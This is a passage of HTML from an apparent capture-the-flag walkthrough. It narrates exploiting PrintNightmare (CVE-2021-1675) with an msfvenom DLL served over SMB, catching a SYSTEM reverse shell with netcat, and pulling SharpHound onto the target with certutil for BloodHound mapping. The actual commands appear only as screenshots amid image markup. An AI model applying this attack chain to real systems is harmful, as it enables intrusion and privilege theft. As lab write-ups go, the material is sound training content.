url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACUklEQVR42n1T6ZKaQBjkUXbl9EJgYAA5HEARRV2Nu9m8/4t0mtmkKpVU5UcXxTH99fFhOGELK7rACkbYvkIQN6jbG8rdBen2RAzY1iOK3RVpeUbdvEGkB5iuhOulcN0UDmF7Gcx5BiNVd4RpD5s3piexCipsqxEy7+GHOyw3FRy+m68LTSrzAWHS8bsdmrDGsxhwFQoZz75wgJGoHwjSAZYb49UWJKjRn79rwsWqwNIvqSaBs9iiO35HTHUWD1pUGMkD+tMnHVFU3MHmN0bd3ZGVJ/jRDt4qx8KvcDi+o5osUs0qqDFzYq2yot3J/vTs1Y6xES3U/hvvFR1UsJcFjFLd0BwetHlGlLTYRAoNh9TNjYcvWqGzyIgcqnto0iQ/6ggmhfvhAzmzXZDQdJmh6m7Itj1M2jXtCEtOU/sn1R0hkgOE7HRRk6q2f6e9N13WmvmuOXwiX9KVx3gsFmPE1TtW4oQZyawJywau/MDMEngxI7zyOmVrzyUqkmXFiQM6XdjU9JTv11XqbA17s8c8ucNPb1iLTtsu1YO2H1ydKypGkpcjVR2RkmzagEnZjAS2l2pYf8BwNgrr9IpMfUKWF+TFEaq5omc2zeGJff9EQZKp3Yj2U773uSa/Ff0Nww1oMRywFGek1RU72jqNnyQeEIhGQyR7yKwn4Z6Wh/8TemEHV4yYR2fMqTbnCpVsvNAYkf9Sl5BwWmrJEiTte+stCf4lNULZ6/r9UMFnk24wwItOSGSLjMu95q/piBs8cYUb3zn8jYNbZt1wD5X+s76Iv0r5CV8JiqFLrdsWAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CVE-2021-1675" title="" src="/static/e891808377aa53258e6a7f3bafaee368/50637/cve-2021-1675.png" srcset="/static/e891808377aa53258e6a7f3bafaee368/dda05/cve-2021-1675.png 158w, /static/e891808377aa53258e6a7f3bafaee368/679a3/cve-2021-1675.png 315w, /static/e891808377aa53258e6a7f3bafaee368/50637/cve-2021-1675.png 630w, /static/e891808377aa53258e6a7f3bafaee368/e899a/cve-2021-1675.png 682w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used <code class="language-text">msfvenom</code> to generate the DLL payload (<code class="language-text">shell.dll</code>):</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1457c929f8c7de3c28656a5895223dd2/ee7ce/generate-payload.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABLUlEQVR42nWR2XKDMAxF+ZYsLB0HBxPALGZxgEICCWna/v+f3CrOtNOH9uGOZM31sSRbtpjgHC7w9iVUNaPSVzTtDWVzRVHPSNUJ1XExeVFfEMoeL74CI7/Dcri7Ai4rqFaaaMn6BlktUM0M3d3Q9u8U79AE7YZPyt/QjR8o9QLd3yGLkXSCzEeIpIOIOxzkABG1BMxhaX1BXU8EWKirmYyDMUdJT6ajkcsyI4+62bgJ1k78lBub8++axfcKPCjBeAGfxmB+bsbxCLC2I6y2ERmfWtmRufQN+UvWZj9iw0c49LrMeuS0s6KckKkJKY0Wp6+Un5FkA+3zjJ2oDPhfoIhbBGGNHVewgzNcrpGkHcJIw+Y9tsFEmrEVV9h+C5+ADzGa7HGXhw19TvbT+RflB8UERJ49KAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="generate payload" title="" src="/static/1457c929f8c7de3c28656a5895223dd2/50637/generate-payload.png" srcset="/static/1457c929f8c7de3c28656a5895223dd2/dda05/generate-payload.png 158w, /static/1457c929f8c7de3c28656a5895223dd2/679a3/generate-payload.png 315w, /static/1457c929f8c7de3c28656a5895223dd2/50637/generate-payload.png 630w, /static/1457c929f8c7de3c28656a5895223dd2/ee7ce/generate-payload.png 756w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Started a Netcat listener:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 408px; " > <a class="gatsby-resp-image-link" href="/static/f467b032063eac6c813bad780038f1ff/84f3a/netcat-1.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.78481012658228%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA80lEQVR42mWO606DMBiGuRJ1o7BuIKgdpcgKZcwwGAedbibe/328lhIXEn88+U55n3wW3eYg7AQSnWHzL9isxzJUoEwir85Qx0+kZW+o33/w1l6xKztdv/FanDQN0qJFnB3hPApYTjKACC2LOrjZBVRewNWADcvBZa1FHRI1BlsjlYcBImugqg8jEXltKs8qLYxhyeoKoQNJ3kAUNVh6gNz3JhREezyLEmQTw9bcuczwsGK4d1+woFvTL+gE8TisMFK6EaBPEjRI4XgJHD8BDVOsgonxTvwZs9nx4xtGaK9jLNf8xvjJfP7b3fD+Q7xJNgp/ARc7okOu1LTMAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat" title="" src="/static/f467b032063eac6c813bad780038f1ff/84f3a/netcat-1.png" srcset="/static/f467b032063eac6c813bad780038f1ff/dda05/netcat-1.png 158w, /static/f467b032063eac6c813bad780038f1ff/679a3/netcat-1.png 315w, /static/f467b032063eac6c813bad780038f1ff/84f3a/netcat-1.png 408w" sizes="(max-width: 408px) 100vw, 408px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Using <code class="language-text">smbserver.py</code>, I started the SMB server which hosted a share named <code class="language-text">smb</code> that contained the <code class="language-text">shell.dll</code> payload:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/eeed7aee8832cfc40d2b8c4c999fd129/6f406/start-smb-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 26.58227848101266%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBElEQVR42m2Q2W6DMBBF+ZUmJGE3Owa8QBIIqKVqm/L/n3I7dp8q9eFoRtYsZ+xE5YRYfCNsn4jrBcPtA2raoecnhnWHnL7QqVdwsRArhN5Q8Al+LBAyiSCRNjfRizo4WT6iKEewVIBlCmk+IGYKXtjBj3oq7hFQwzngliAR9t0MiFKFONMUNRLqM4Odupkghw2akGQiiKadiQfafkXFZ3CKTbugpFouV/T6zeasuNKSFi+nEodzheOlhmOab3TeffrEcH3HY9lRNXdrmZJ9QgYGlpE5GRmTJNdkpuzJZqB7aeB6vzh63OyZuTmbimr6H89vcHALHE8FDmb7f1ijiobUf/gByj+jCNQrpSQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="start SMB server" title="" src="/static/eeed7aee8832cfc40d2b8c4c999fd129/50637/start-smb-server.png" srcset="/static/eeed7aee8832cfc40d2b8c4c999fd129/dda05/start-smb-server.png 158w, /static/eeed7aee8832cfc40d2b8c4c999fd129/679a3/start-smb-server.png 315w, /static/eeed7aee8832cfc40d2b8c4c999fd129/50637/start-smb-server.png 630w, /static/eeed7aee8832cfc40d2b8c4c999fd129/6f406/start-smb-server.png 710w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I ran the exploit which connected to the target system and attempted to execute the DLL payload hosted on the SMB server:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/afbaa3f3e0a19ff1fd35217b3f14d9f4/dfb88/run-exploit.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.11392405063291%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABLUlEQVR42l2Py5KCMBBF+RZEHooQgYQEEAngE2dwLK0pV/P/X3Gnia5cnGpoqs+9WEFxRVA+INsbLtcnfh5/GMYndsMv9OmO5nCDnjje0Z0fqPoRYdYgFh2Y7JGoPVjeI+ItwnQLq9zsUW12KMoWSmmoooVQ9DGpEWUaTLSIuaYDDTdUsL0MTiAwXxILTjuJOeEsJxSsbX/DtruCFwdkxREZJap6QCIonZJTucOa2qzpnXGaeUdBDVbUJiKWcYGQlWBpjUVMwrobUTYD5OaMuh1R6++X0Mj2RhSlDdypATUz+NwwD/j7mVp7CWYug1XpL8jqCM/8DicEZv50mNNBbqbj57TjZm8gqU3T9lLYbvImNVhlc0FeneCvig+JMCIn+ISEJHoxhVBYIN8o/APijcKjloCueQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="run exploit" title="" src="/static/afbaa3f3e0a19ff1fd35217b3f14d9f4/50637/run-exploit.png" srcset="/static/afbaa3f3e0a19ff1fd35217b3f14d9f4/dda05/run-exploit.png 158w, /static/afbaa3f3e0a19ff1fd35217b3f14d9f4/679a3/run-exploit.png 315w, /static/afbaa3f3e0a19ff1fd35217b3f14d9f4/50637/run-exploit.png 630w, /static/afbaa3f3e0a19ff1fd35217b3f14d9f4/dfb88/run-exploit.png 733w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>SMB server showing incoming connections from the target machine:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 605px; " > <a class="gatsby-resp-image-link" href="/static/ce3daa337053bedd81c9c4962caf49b4/0af3a/smb-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 78.48101265822784%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACjklEQVR42oVT2XLaUBTjT5KwmbAEMHjfd2zALNmatv//G6rOhcx0pqF50FybxLrSkU5naJYYeq/EB/rWEcugRr59R1S/IeVZHH8ia3/Ay4/wkj1Cnn5+gBvvEGQHaHMfvbGl0B+b6CzdBguvxsTMMLMK6G6FpV1g4W6wcHLM3YKXbDAzEyytHNqTh/EyxMLKMNFDzM0Us3XM95x/z9DRrQQGP3SCCmuebrKD4deYrSJM+OFUv5wTntNVrEjU73wWIsHjIuQlAfoTGx3bq+CTJCla+GGFsj7BpiI/3SOgvax5Q1SeeZHYPfD5RLt7eFmLZPOMpHqGFTYUscFACA3aNf1G/dPKKWD7FWyvQE/TcTdY4l5bK9wNV7gfGehyVt1HE92RiQe+C9Q7IXPsmF4DJ9ojKZ9JvEHMG714i5keKMhcnowUK7dUNj8JemNbWRTI82cwHSfck+QF1e4DzeEXqvYnap5hyhTTFrvzb6T168V6cVRhPBnJlcj6B0qhyRD89Ig4PyEleZCdqPgI3UqVxeHMVQTDqcMAfIxYlf74FqFbww63yrbHbknX7GinerbmTAcThzbXyua9Zih8zutLQpuBePFlhhEVBhmTpUUJKcovFqV7AqmOKLxFpgi9ayBl887zjGzzqmwLuRNtmXypApFamKyTlPph9I3CID2Q6AVxcVbkqXQraBSK3Tvne7j0jWsp89Tm3m1Cg6smcDhHCSWkZblAxqBzFcXyQtZynXDNsu9TtqnCT1qk5QtxsZzRck6IosH1QyEYMOXetdg3Ffpxq6zmMjvalTnmDCWiSpdpywxl8UWZXCDq/kvoBFuumYXR1MOI8xForIpGNdK1rtREVuzR/GtLvibrjy38AQ4XEj3wKwerAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="smb server" title="" src="/static/ce3daa337053bedd81c9c4962caf49b4/0af3a/smb-server.png" srcset="/static/ce3daa337053bedd81c9c4962caf49b4/dda05/smb-server.png 158w, /static/ce3daa337053bedd81c9c4962caf49b4/679a3/smb-server.png 315w, /static/ce3daa337053bedd81c9c4962caf49b4/0af3a/smb-server.png 605w" sizes="(max-width: 605px) 100vw, 605px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After the exploit completed, <code class="language-text">nc</code> caught a shell as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 523px; " > <a class="gatsby-resp-image-link" href="/static/1f87024a586ffbd72441ad60cb6c4fa1/7cd60/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 82.27848101265823%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACd0lEQVR42m2U6XaqMBSFfZRW6SDIpIEwg4KztnZY9/3fZN99glrr6o+9QiD5ss8QBs9qAUufqE88Zd8YJ1sEaYtq9UGdULRvaDafHI8ouwPSeot0vseTm2A4VhjakRktJzYaqOqIYvnNRQdE9Q5Vd0JcbqGKDZxphdegwIufw4/ncBXnfgY7zKmC30szelGNZ1f3wGx+REUXSbVHPhcXJyT1/jomzZ6HHdEd/qE2jo+IihUhDUK9MKPKOrx4KUZ0O/DiFnG1hSZQAHLALFtBlztzQEynYbpEkHSY5Suu2SEgSOVLTJMW1n3Ioe6QNgdC1gyr5eKWC5dmrvI1nicpN8QYOdpoSFmTBE9GfZiX0QB1tUPZvhMm9n8kG0a2NrDH16jXuNfDeT7k8wV0BcpmzZDT+kBHG1MQcezOGia8YiHm5jBx7vFZciZzn3NXNYTo38CAYZrknyUwcS051IQXi3cWYYPJrKYaIzlE4PLOsu+A0hpeJAsazNJVf/o5/IBJN+4SqWKGhxf1E/5ZkpZb6CAr19Asuz+roNIOU1ZUIAKXZymMYoFe2YuWk/ySwC4yUJvACUEZu3+qSijNnuItkZAF4tNln9seaByKpOo3sFsoQ65Ni/RJr2C7EVSyQMjWEai4FIUMW5zLe9kzsv+GDiTJApMedCTpvE5emMGjcwEITPLssOIT5tllvu2g/BNmgAV7UFSvPo3Toj2Z2+GYO1uhWX+ZhT+9F5vQ73N4Bepzu+SLNxNW1vBud+/mL2OHJcZ+0W+m5Hu1/MBi+8173LLyeX+LboGP50RfHFhOhohFkEMkHdLAUhQJX5pe7nrKb1Iw6cN74H/AvAigqykMtQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/1f87024a586ffbd72441ad60cb6c4fa1/7cd60/system-shell.png" srcset="/static/1f87024a586ffbd72441ad60cb6c4fa1/dda05/system-shell.png 158w, /static/1f87024a586ffbd72441ad60cb6c4fa1/679a3/system-shell.png 315w, /static/1f87024a586ffbd72441ad60cb6c4fa1/7cd60/system-shell.png 523w" sizes="(max-width: 523px) 100vw, 523px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Another method of escalating privileges is by exploiting GPO permissions. Back on the initial shell as the <code class="language-text">enterprise-security</code> user, running <code class="language-text">net user enterprise-security</code> showed that the only group this user had membership in was <code class="language-text">Domain Users</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 601px; " > <a class="gatsby-resp-image-link" href="/static/20b8007dd80d6a32be2100417013748f/31d03/net-user-enterprise-security.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.88607594936708%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACG0lEQVR42n2T+XLaQBjD/SrcNsb3AQZfGBMKzUGm07z/m6jSUmCSkv6hMcb2b/VJu1ZRnVB3b2goL6wRZzsEyRZe1CJKd+iPH+hPH2j7M7b9O6/v8OOW2iLkcz/uLko6TN01rHX9bF4K0xajWYbBJMFwmlIZ73OU7SsaPtdCXtQYkP7X84tyDP5qaC8F/ImiPEHgqn1BEDdwvI35aDovkCz3iG6uCaTzGZ2M7Bxje4UJNbrKWcHSyNX2FavyiJrXRVARxIdc3eaHFR3O/dIs4nil+T2mk7tWRjdgkLSQ/Lgx2diLwsDGdDhxlnTYYxE2/H9tgDYlhw+BlFVyzP3xN+RUxRR0KuBwkhqn7e5M9ycu2iHO90ZuUJtIHkGthh88Eaj8DmyzU4vKifnN3MLEEdC5yyjkVDnai80X4B1qJRlXTjvomuQ9stUTcsplVnIY8pla1w5Qo9f2P8PuUKvlmFXzgnb7xq3R0UWLOQsYjhPT4Nzf8MX8otnyP7CLLMFqjqv8chYwIEj5qRRpymIcjqjx1brGtT+V8gUYsWGNm3G/zfmRwzanrN+0zBe0oSNzIhqTpSJYMMfvnFohXwx1lHjsPAaf5Ts4dGBaJtj1K46fmvuhcpxlJs9vHS4LlbCHrsXmByqenDW3ieCCeGxWmQqssZXl5JrpI6AgZX2CyikJ2x9+oW6esVof2P6O2Z4v55hgxWE2/Q34L/QPWM++w63a6uUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="net user enterprise-security" title="" src="/static/20b8007dd80d6a32be2100417013748f/31d03/net-user-enterprise-security.png" srcset="/static/20b8007dd80d6a32be2100417013748f/dda05/net-user-enterprise-security.png 158w, /static/20b8007dd80d6a32be2100417013748f/679a3/net-user-enterprise-security.png 315w, /static/20b8007dd80d6a32be2100417013748f/31d03/net-user-enterprise-security.png 601w" sizes="(max-width: 601px) 100vw, 601px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The next step was to map the domain with BloodHound in order to get a better idea of the AD environment. But first, I needed the AD data to import into BloodHound, so I started a python web server which contained <a href="https://github.com/BloodHoundAD/SharpHound" target="_blank">SharpHound</a>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 510px; " > <a class="gatsby-resp-image-link" href="/static/3a15a455cb94e730ccbaded355b4d900/804c1/http-server-sharphound.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABNklEQVR42jWQ6XKDMAyEeZdAwCYECOEo2Bwm5IDcadrp+z/IVnbpj52VbM2OPlnLzQl2fIedPGFHJ3hhhaa7oh9e6HZP7A5vDIdPKOrb/g7RnFGrK/09yG+oaur7B3gksXAzWBv5QpztEcSK1GHJMvhBidVawF9LckkuwHUfCLBVBR5Uptdic+3wAraXw0rzAVsKjLcDqYfjpuD+B/iqhEduQkNJIcIE6UATOof9y2FzoJ1csEjfpG9CHxFlyiBO5x8cxy/0+xcUIWn8mk5RiomwL1TfINoL8uoISeg8FIScwiqaOwoaKOSEJO8h6gmVGNG0Vwg5IoxrFNUJUdJhk/bkikgU1TtDJGkuTFosCdlhtKFHN2M8N3JpbZflRt4sprEJSeN7fgmX/7nG1q5Pot80ru1l+AXwjcWOI8ghRgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="http server SharpHound" title="" src="/static/3a15a455cb94e730ccbaded355b4d900/804c1/http-server-sharphound.png" srcset="/static/3a15a455cb94e730ccbaded355b4d900/dda05/http-server-sharphound.png 158w, /static/3a15a455cb94e730ccbaded355b4d900/679a3/http-server-sharphound.png 315w, /static/3a15a455cb94e730ccbaded355b4d900/804c1/http-server-sharphound.png 510w" sizes="(max-width: 510px) 100vw, 510px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used <code class="language-text">certutil.exe</code> to download <code class="language-text">SharpHound.exe</code> onto the target machine:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7819167a1b7a6f474fd9e92270029239/5a032/download-sharphound.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.126582278481013%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAe0lEQVR42k3M2w6CMBAEUL5FJamX3lhCN7YFaYSIl///nLGtLz6c7E4mmcb5B8L0Rpw/4Pyz3+AyDi/Y4Q5FM856hO5uuJgR0k4wlHBSEbJLkLmXOavSW4+Gw4ZrfFZlkHhBzyvILTB9qgOafvcgXNUKxr44/hEDdq3GF+u8QUktG7v5AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="download SharpHound" title="" src="/static/7819167a1b7a6f474fd9e92270029239/50637/download-sharphound.png" srcset="/static/7819167a1b7a6f474fd9e92270029239/dda05/download-sharphound.png 158w, /static/7819167a1b7a6f474fd9e92270029239/679a3/download-sharphound.png 315w, /static/7819167a1b7a6f474fd9e92270029239/50637/download-sharphound.png 630w, /static/7819167a1b7a6f474fd9e92270029239/5a032/download-sharphound.png 748w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After running <code class="language-text">SharpHound.exe</code>, a ZIP with the domain data was provided:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/09a56b894f599091837bf6956308640c/14945/run-sharphound.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 125.9493670886076%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAZCAYAAAAxFw7TAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEPklEQVR42mWV6XLbRhCE8SZRzJsg7vs+eIk0aUmWklSq/P6vMflmwcQp+cfUgovd3u6eXtDK26uk9bO0+xcp+5tUw03K4S7N4ZXxG7/vkvA+ay6SUlF5EjtoxUtHM278WrxsL07UiR12YhXtzSzujm9SAViP38zz8PwhefdVqvFuDtA1IWBxfTbA+i6pL5K1F/GzA7WXgNFqD2+S8aLsvxqmOYt1cwNwPb7IcP4O2zdzUNEr+5th31JxeTbzSXU2jJ14EKs/fjdANUyUoUovsKE/fZeOGi9/yEDpRmWqoGFxkiA/iJuMBshPJ3ZO3IulYAX02/0rQF/N6Q2g9eFFWiP9XcbrBNgwp56rXz5AOzzzkonZNuhk6ZRidQBkgB4uf0oJcA9If3qT/eVDDte/5Pb6Q873v2U8v08sH43L8a7srqi6Mk7Pa7fCQ9h0lI4pXhSNLqA5yKv7bzIgW73MmY+KI2ueJUJuWh4lp0FJcRAvaiTOBnFDAHWjstJmuNHA4qOE+KFjXJwlAyDGsxCfdkEjARLdqEfqID7lRURnl8nWLWTnI1lPrvu7OdnBk4CNoUbAjAcYnAy4D9DObx9jA5uW6jiklbVTie13eDuK1RBejUjV3c3pyignRkWN9Pb2CPx0YMQBepge5Cd7mDNHeQnz+Vk2TjEB1hh9JBo+bVdpUXbCo2dJyJlGyDxrVFI2pkdTfjyBhKwNMuzJTwBmxIaTFXRPFyuaoYBeiD8x+Yr3hlUQT3O22yC3Q2qP1B6LxmlEqkd0VnaCh0gLOVlBs0qbgNyGK4dc7fJI8JsB2WQ0rya2aXmF8SQ3ZX1aX01tnVysBKoxpqt/ykb923mNLDaZLLc5VfxXczNXyGKd876QGeN8q8WcXcrSLibJ4+mdLL6a8fbyQzLiMl+nSCio0tR69yjzXDFXMdZmNGC809Gq+ruJzV5Bx1c5nD54/pCarmsjlHGC+QFd9fBV/VN/1Uv12MW/jdtyDQfZeK1YtluLg0RXs6UGM7mjXO6mQ+5s3m2cWmarVL4sk0/jVLNVJl8eZc2XkXiE09WNUFYgBXRgoEHW8CqrgKzZzM+wQr2crz9XbsoKuEZrFqyoBYu3RCNAktYGX+abdLpBSHY4TJn9CvazrB2SlwAtVonMlzGmF4adSl9ucpkhT7uu8jc0Y/YJYPELIPdwtZkAXTZFxGdFFHw+FAZA/aI0Ei7htVmjV82n1nj7+yfGljZjDYAC+niVkkVlHSJxy4Yvi9jI9Dm44hYVgGrlHOixT2uFwn+ZW45XGw9VdohvKSHXrsds1gTMFon5EAz8vvD+wsfhzJ3f8283UoNbivN/QJvPtgIqQw/TVbLNlzfUz7o2xXhI10P9BpJFmC1g9ds8kifYP+H70yIySjRO5PAnoP8ANJLZqIfNWLzimnkAhvgWc+/1OeC9S/M8squHaNxsr5Z/AAqDO1CuSfCnAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="run SharpHound" title="" src="/static/09a56b894f599091837bf6956308640c/50637/run-sharphound.png" srcset="/static/09a56b894f599091837bf6956308640c/dda05/run-sharphound.png 158w, /static/09a56b894f599091837bf6956308640c/679a3/run-sharphound.png 315w, /static/09a56b894f599091837bf6956308640c/50637/run-sharphound.png 630w, /static/09a56b894f599091837bf6956308640c/14945/run-sharphound.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I copied the BloodHound ZIP into the <code class="language-text">Enterprise-Share</code> SMB share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1888e65be57b5146d0840612d40a511d/adb42/copy-bloodhound-data-enterprise-share.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 8.860759493670885%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAgElEQVR42iWNUQ6DIBBEvUoTSPXDVIqCIIolWlCj97/NdLEfkzeZ7M4U03zCjQfmcMFNB/kdY878Cet2NPID0QbUjYfUC2m9KbqAzkS81YIX3dTCk19RWJfQ24iBijLNkKhog6URRQ/aJLT9Fw8uwUsN9lRgpQKv/mSU8UrfzPoBWkxCXS8K9tYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="copy BloodHound data into Enterprise-Share" title="" src="/static/1888e65be57b5146d0840612d40a511d/50637/copy-bloodhound-data-enterprise-share.png" srcset="/static/1888e65be57b5146d0840612d40a511d/dda05/copy-bloodhound-data-enterprise-share.png 158w, /static/1888e65be57b5146d0840612d40a511d/679a3/copy-bloodhound-data-enterprise-share.png 315w, /static/1888e65be57b5146d0840612d40a511d/50637/copy-bloodhound-data-enterprise-share.png 630w, /static/1888e65be57b5146d0840612d40a511d/adb42/copy-bloodhound-data-enterprise-share.png 741w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Downloaded the ZIP using <code class="language-text">smbclient</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5ab850eb6e34aba1c9f11ad2c33769e8/ee7ce/get-bloodhound-data.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 33.54430379746836%; position: relative; bottom: 0; left: 0; background-image: 